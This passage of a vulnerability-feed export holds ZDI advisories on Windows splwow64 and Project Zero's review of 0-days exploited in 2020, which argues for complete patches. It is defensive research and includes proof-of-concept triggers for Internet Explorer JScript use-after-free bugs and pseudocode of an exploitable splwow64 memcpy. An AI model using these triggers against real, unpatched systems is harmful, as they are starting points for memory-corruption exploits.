proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-020", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-020/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-022", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-022/", "title": "Microsoft Windows splwow64 Untrusted Pointer Dereference Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-21T19:27:56", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-21T00:00:00", "published": "2021-01-21T00:00:00", "id": "ZDI-21-078", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-078/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2021-02-04T19:27:43", "bulletinFamily": "info", "cvelist": ["CVE-2014-9665", "CVE-2015-0093", "CVE-2015-0993", "CVE-2018-8653", "CVE-2019-0880", "CVE-2019-1367", "CVE-2019-13674", "CVE-2019-13695", "CVE-2019-13764", "CVE-2019-1429", "CVE-2019-5870", "CVE-2020-0674", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-15999", "CVE-2020-17008", "CVE-2020-27930", "CVE-2020-6383", "CVE-2020-6572", "CVE-2020-6820", "CVE-2021-1648"], "description": "A Year in Review of 0-days Exploited In-The-Wild in 2020\n\nPosted by Maddie Stone, Project Zero\n\n2020 was a year full of 0-day exploits. Many of the Internet\u2019s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches \u2014 patches that don\u2019t correctly and comprehensively fix the root cause of a vulnerability \u2014 allow attackers to use 0-days against users with less effort.\n\nSince mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero\u2019s mission has been to \u201cmake 0-day hard\u201d. From that came the goal of our in-the-wild program: \u201cLearn from 0-days exploited in-the-wild in order to make 0-day hard.\u201d In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public\u2019s understanding of 0-day exploitation is only helpful when it doesn\u2019t diverge from the \u201cprivate state-of-the-art\u201d, what attackers are doing and are capable of. \n\nOver the last 18 months, we\u2019ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. [For the 2nd year in a row](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we\u2019re publishing a \u201cYear in Review\u201d report of the previous year\u2019s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in each individual exploit\u2019s analysis, please check out our[ root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>). \n\nWhen looking at the 24 0-days detected in-the-wild in 2020, there\u2019s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days.\n\nA correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we\u2019re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.\n\nWhile the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.\n\n# This vulnerability looks familiar \ud83e\udd14\n\nAs stated in the introduction, 2020 included 0-day exploits that are similar to ones we\u2019ve seen before. 6 of 24 0-days exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days are related to a previously seen vulnerability. We\u2019re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it\u2019s much easier to then exploit another. \n\n\nProduct\n\n| \n\nVulnerability exploited in-the-wild\n\n| \n\nVariant of... \n \n---|---|--- \n \nMicrosoft Internet Explorer\n\n| \n\nCVE-2020-0674\n\n| \n\nCVE-2018-8653* CVE-2019-1367* CVE-2019-1429* \n \nMozilla Firefox\n\n| \n\nCVE-2020-6820\n\n| \n\nMozilla [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>) \n \nGoogle Chrome\n\n| \n\nCVE-2020-6572\n\n| \n\nCVE-2019-5870\n\nCVE-2019-13695 \n \nMicrosoft Windows\n\n| \n\nCVE-2020-0986\n\n| \n\nCVE-2019-0880* \n \nGoogle Chrome/Freetype\n\n| \n\nCVE-2020-15999\n\n| \n\nCVE-2014-9665 \n \nApple Safari\n\n| \n\nCVE-2020-27930\n\n| \n\nCVE-2015-0093 \n \n* vulnerability was also exploited in-the-wild in previous years \n \n## Internet Explorer JScript CVE-2020-0674\n\nCVE-2020-0674 is the fourth vulnerability that\u2019s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the [2019 year-in-review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) we devoted a section to these vulnerabilities. [Google\u2019s Threat Analysis Group attributed](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>) all four exploits to the same threat actor. It bears repeating, the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.\n\nJScript is the legacy Javascript engine in Internet Explorer. While it\u2019s legacy, [by default it is still enabled](<https://support.microsoft.com/en-us/topic/option-to-disable-jscript-execution-in-internet-explorer-9e3b5ab3-8115-4650-f3d8-e496e7f8e40e>) in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I\u2019ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.\n\n### CVE-2018-8653\n\nIn December 2018, it was discovered that [CVE-2018-8653](<https://msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653>) was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeof callback. McAfee also wrote a [write-up going through each step of this exploit](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ie-scripting-flaw-still-a-threat-to-unpatched-systems-analyzing-cve-2018-8653/>). \n\nvar objs = new Array();\n\nvar refs = new Array();\n\nvar dummyObj = new Object();\n\nfunction getFreeRef()\n\n{\n\n// 5. delete prototype objects as well as ordinary objects\n\nfor ( var i = 0; i &lt; 10000; i++ ) {\n\nobjs[i] = 1;\n\n}\n\nCollectGarbage();\n\nfor ( var i = 0; i &lt; 200; i++ )\n\n{\n\nrefs[i].prototype = 1;\n\n}\n\n// 6. Garbage collector frees unused variable blocks.\n\n// This includes the one holding the \"this\" variable\n\nCollectGarbage();\n\n// 7. Boom\n\nalert(this);\n\n}\n\n// 1. create \"special\" objects for which isPrototypeOf can be invoked\n\nfor ( var i = 0; i &lt; 200; i++ ) {\n\nvar arr = new Array({ prototype: {} });\n\nvar e = new Enumerator(arr);\n\nrefs[i] = e.item();\n\n}\n\n// 2. create a bunch of ordinary objects\n\nfor ( var i = 0; i &lt; 10000; i++ ) {\n\nobjs[i] = new Object();\n\n}\n\n// 3. create objects to serve as prototypes and set up callbacks\n\nfor ( var i = 0; i &lt; 200; i++ ) {\n\nrefs[i].prototype = {};\n\nrefs[i].prototype.isPrototypeOf = getFreeRef;\n\n}\n\n// 4. calls isPrototypeOf. This sets up refs[100].prototype as \"this\" variable\n\n// During callback, the \"this\" variable won't be tracked by the Garbage collector\n\n// use different index if this doesn't work\n\ndummyObj instanceof refs[100]; \n \n--- \n \n### CVE-2019-1367\n\nIn September 2019, [CVE-2019-1367](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1367>) was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though the variables that are not tracked are in the arguments array in the Array.sort callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2019-1429\n\nThe CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in the in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied! \n\nIn November 2019, Microsoft released another patch to address this gap. [CVE-2019-1429](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1429>) addressed the shortcomings of the CVE-2019-1367 and also fixed a variant. [The variant](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>) is that the variables in the arguments array are not tracked by the garbage collector in the toJson callback rather than the Array.sort callback. The only difference between the variant triggers is the highlighted lines. Instead of calling the Array.sort callback, we call the toJSON callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n+ // 1. Cause toJSON callback to fire\n\n+ var o = {toJSON:F}\n\n+ JSON.stringify(o);\n\n- // 1. Call sort with a custom callback\n\n- [1,2].sort(F); \n \n--- \n \n### CVE-2020-0674\n\nIn January 2020, [CVE-2020-0674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0674>) was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only changes required to the trigger for CVE-2019-1367 is to change the references to arguments[] to one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.\n\nvar spray = new Array();\n\n+ function F(arg1, arg2) {\n\n- function F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in one of the named arguments\n\n// The named arguments aren't tracked by garbage collector\n\n+ arg1 = spray[5000];\n\n- arguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JScript variables get reclaimed... \n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in\n\n// a named argument\n\n+ alert(arg1);\n\n- alert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2020-0968\n\nUnfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>), another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the [advisory](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>)). \n\nvar spray = new Array();\n\nfunction f1() {\n\nalert('callback 1');\n\nreturn spray[6000];\n\n}\n\nfunction f2() {\n\nalert('callback 2');\n\nspray = null;\n\nCollectGarbage();\n\nreturn 'a'\n\n}\n\nfunction boom() {\n\nvar e = o1;\n\nvar d = o2;\n\n// 3. the first callback (e.toString) happens\n\n// it returns one of the string variables\n\n// which is stored in a temporary variable\n\n// on the stack, not tracked by garbage collector\n\n// 4. Second callback (d.toString) happens\n\n// There, string variables get freed\n\n// and the space reclaimed\n\n// 5. Crash happens when attempting to access\n\n// string content of the temporary variable\n\nvar b = e + d;\n\nalert(b);\n\n}\n\n// 1. create two objects with toString callbacks\n\nvar o1 = { toString: f1 };\n\nvar o2 = { toString: f2 };\n\n// 2. create a bunch of string variables\n\nfor (var a = 0; a &lt; 20000; a++) {\n\nspray[a] = \"aaa\";\n\n}\n\nboom(); \n \n--- \n \nIn addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of \u201cplug and play\u201d quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit. \n\n## Firefox CVE-2020-6820\n\nMozilla patched [CVE-2020-6820 in Firefox with an out-of-band security update](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/>) in April 2020. It is a use-after-free in the Cache subsystem. \n\nCVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the context process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl (must be the Parent which lives in the browser process in order to get the use-after-free in the browser process; the Child would only provide in renderer) still has ReadStreams when StreamList::CloseAll is called, then this will cause the CacheStreamControlParent to be freed. The mId member of the CacheStreamControl parent is then subsequently accessed, causing the use-after-free.\n\nThe execution patch for CVE-2020-6820 is:\n\nStreamList::CloseAll \u2190 Patched function\n\nCacheStreamControlParent::CloseAll\n\nCacheStreamControlParent::NotifyCloseAll\n\nStreamControl::CloseAllReadStreams\n\nFor each stream:\n\nReadStream::Inner::CloseStream\n\nReadStream::Inner::Close\n\nReadStream::Inner::NoteClosed\n\n\u2026\n\nStreamControl::NoteClosed\n\nStreamControl::ForgetReadStream\n\nCacheStreamControlParent/Child::NoteClosedAfterForget\n\nCacheStreamControlParent::RecvNoteClosed\n\nStreamList::NoteClosed\n\nIf StreamList is empty &amp;&amp; mStreamControl:\n\nCacheStreamControlParent::Shutdown\n\nSend__delete(this) \u2190 FREED HERE!\n\nPCacheStreamControlParent::SendCloseAll \u2190 Used here in call to Id() \n \n--- \n \nCVE-2020-6820 is a variant of an internally found Mozilla vulnerability, [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>). 1507180 was discovered in November 2018 and [patched in December 2019](<https://hg.mozilla.org/mozilla-central/rev/cdf525897bff>). 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, [an explanatory comment](<https://hg.mozilla.org/mozilla-central/rev/25beb671c14a>) for why the December 2019 patch was needed was added in early March 2020. \n\nFor 150718 the execution path was the same as for CVE-2020-6820 except that the the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls \u201chigher\u201d in StreamList::CloseAll.\n\nIn my personal opinion, I have doubts about whether or not this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [[1](<https://bugzilla.mozilla.org/show_bug.cgi?id=1626728#c15>), [2](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180#c10>)]), has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn\u2019t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our [in-the-wild tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>) and thus included in this list.\n\n## Chrome for Android CVE-2020-6572\n\n[CVE-2020-6572](<https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_7.html>) is use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that a `unique_ptr` is assigned to another, going out of scope which means it can be deleted, while at the same time a raw pointer from the originally referenced object isn't updated. \n\nMore specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder). \n\nThis vulnerability that was exploited in-the-wild was reported in April 2020. 7 months prior, in September 2019, Man Yue Mo of Semmle [reported a very similar vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730>), [CVE-2019-13695](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop.html>). CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572, it\u2019s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.\n\nIn addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The [vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311>) is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is [CVE-2019-5870](<https://chromereleases.googleblog.com/2019/09/stable-channel-update-for-desktop.html>). Guang Gong used this vulnerability as a part of an Android exploit chain. He presented on this exploit chain at Blackhat USA 2020, \u201c[TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>)\u201d. \n\nWhile one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This [was noted in the issue tracker ](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311#c8>)for CVE-2019-5870 and then [brought up again](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730#c1>) after Man Yue Mo reported CVE-2019-13695.\n\n## Windows splwow64 CVE-2020-0986\n\n[CVE-2020-0986](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and [CVE-2019-0880](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0880>), which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D. \n\nFrom this [great write-up from ByteRaptors](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>) on CVE-2019-0880 the pseudo code that allows the controlling of the memcpy is:\n\nvoid GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)\n\n{\n\n...\n\nif(*((BYTE*)(firstAddress + 0x4)) == 0x75){\n\nULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));\n\nif(memcpyDestinationAddress != NULL){\n\nULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));\n\nDWORD copySize = *((DWORD*)(firstAddress + 0x28));\n\nmemcpy(memcpyDestinationAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nThe equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed as highlighted below.\n\nvoid GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)\n\n{\n\n...\n\nif(*((BYTE*)(msgSend + 0x4)) == 0x6D){\n\n...\n\nULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA));\n\nif(srcAddress != NULL){\n\nDWORD copySize = *((DWORD*)(msgSend + 0x40));\n\nif(copySize &lt;= 0x1FFFE) {\n\nULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));\n\nmemcpy(destAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nIn addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the \u201cExploited 0-days not properly fixed\u201d section below.\n\n## Freetype CVE-2020-15999\n\nIn October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, [CVE-2020-15999](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>). [The vulnerability is a heap buffer overflow](<https://savannah.nongnu.org/bugs/?59308>) in the Load_SBit_Png function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.\n\nIn November 2014, Project Zero team member [Mateusz Jurczyk reported CVE-2014-9665](<https://bugs.chromium.org/p/project-zero/issues/detail?id=168>) to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small. \n\nTo patch CVE-2014-9665, [Freetype added a check to the rows and width](<http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/src/sfnt/pngshim.c?id=54abd22891bd51ef8b533b24df53b3019b5cee81>) prior to calculating the size as shown below.\n\nif ( populate_map_and_metrics )\n\n{\n\nFT_Long size;\n\nmetrics-&gt;width = (FT_Int)imgWidth;\n\nmetrics-&gt;height = (FT_Int)imgHeight;\n\nmap-&gt;width = metrics-&gt;width;\n\nmap-&gt;rows = metrics-&gt;height;\n\nmap-&gt;pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap-&gt;pitch = map-&gt;width * 4;\n\nmap-&gt;num_grays = 256;\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( map-&gt;rows &gt; 0x7FFF || map-&gt;width &gt; 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\nsize = map-&gt;rows * map-&gt;pitch; &lt;- overflow size\n\nerror = ft_glyphslot_alloc_bitmap( slot, size );\n\nif ( error )\n\ngoto DestroyExit;\n\n} \n \n--- \n \nTo patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_Sbit_Png` function and changed to `imgHeight` and `imgWidth`, the width and height values that are included in the header of the PNG. \n\nif ( populate_map_and_metrics )\n\n{\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( imgWidth &gt; 0x7FFF || imgHeight &gt; 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\n+\n\nmetrics-&gt;width = (FT_UShort)imgWidth;\n\nmetrics-&gt;height = (FT_UShort)imgHeight;\n\nmap-&gt;width = metrics-&gt;width;\n\nmap-&gt;rows = metrics-&gt;height;\n\nmap-&gt;pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap-&gt;pitch = map-&gt;width * 4;\n\nmap-&gt;num_grays = 256;\n\n- /* reject too large bitmaps similarly to the rasterizer */\n\n- if ( map-&gt;rows &gt; 0x7FFF || map-&gt;width &gt; 0x7FFF )\n\n- {\n\n- error = FT_THROW( Array_Too_Large );\n\n- goto DestroyExit;\n\n- }\n\n[...] \n \n--- \n \nTo summarize: \n\n * CVE-2014-9665 caused a buffer overflow by overflowing the size field in the size = map-&gt;rows * map-&gt;pitch; calculation.\n * CVE-2020-15999 caused a buffer overflow by truncating metrics-&gt;width and metrics-&gt;height which are then used to calculate the size field, thus causing the size field to be too small.\n\nA fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignments to an unsigned short. Including the bounds check of the height and widths from the PNG headers early would have prevented both manners of triggering this buffer overflow. \n\n## Apple Safari CVE-2020-27930\n\nThis vulnerability is slightly different than the rest in that while it\u2019s still a variant, it\u2019s not clear that by current disclosure norms, one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there\u2019s no true \u201cupstream\u201d. However when vulnerabilities were reported in Microsoft\u2019s, Apple\u2019s, or Adobe\u2019s fork, there is a possibility (though no guarantee) that it was also in the others.\n\nCVE-2020-27930 vulnerability was used in an exploit chain for iOS. The [variant, CVE-2015-0993, was reported](<http://bugs.chromium.org/p/project-zero/issues/detail?id=180>) to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft\u2019s implementation of Adobe\u2019s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or handle correctly when n is negative, allowing the font to arbitrarily read and write on the native interpreter stack. \n\n[CVE-2020-27930](<https://support.apple.com/en-us/HT211929>), the vulnerability exploited in-the-wild in 2020, is very similar. The vulnerability this time is in the callothersubr operator in Apple\u2019s implementation of Adobe\u2019s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate nor handle correctly negative values of n, leading to the same outcome of arbitrary stack read/write. \n\nSix years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: How do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There\u2019s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.\n\n# Exploited 0-days not properly fixed\u2026 \ud83d\ude2d\n\nThree vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor. \n\nProduct\n\n| \n\nVulnerability that was exploited in-the-wild\n\n| \n\n2nd patch \n \n---|---|--- \n \nInternet Explorer\n\n| \n\nCVE-2020-0674\n\n| \n\nCVE-2020-0968 \n \nGoogle Chrome\n\n| \n\nCVE-2019-13764*\n\n| \n\nCVE-2020-6383 \n \nMicrosoft Windows\n\n| \n\nCVE-2020-0986\n\n| \n\nCVE-2020-17008/CVE-2021-1648 \n \n* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild \n \n## Internet Explorer JScript CVE-2020-0674\n\nIn the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, it still didn\u2019t comprehensively fix all of the variants. Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>) in April 2020. We show the trigger in the section above.\n\n## Google Chrome CVE-2019-13674\n\n[CVE-2019-13674](<https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html>) in Chrome is an interesting case. When it was [patched in November 2019](<https://chromium.googlesource.com/v8/v8/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>), it was not known to be exploited in-the-wild. Instead, [it was reported by security researchers Soyeon Park and Wen 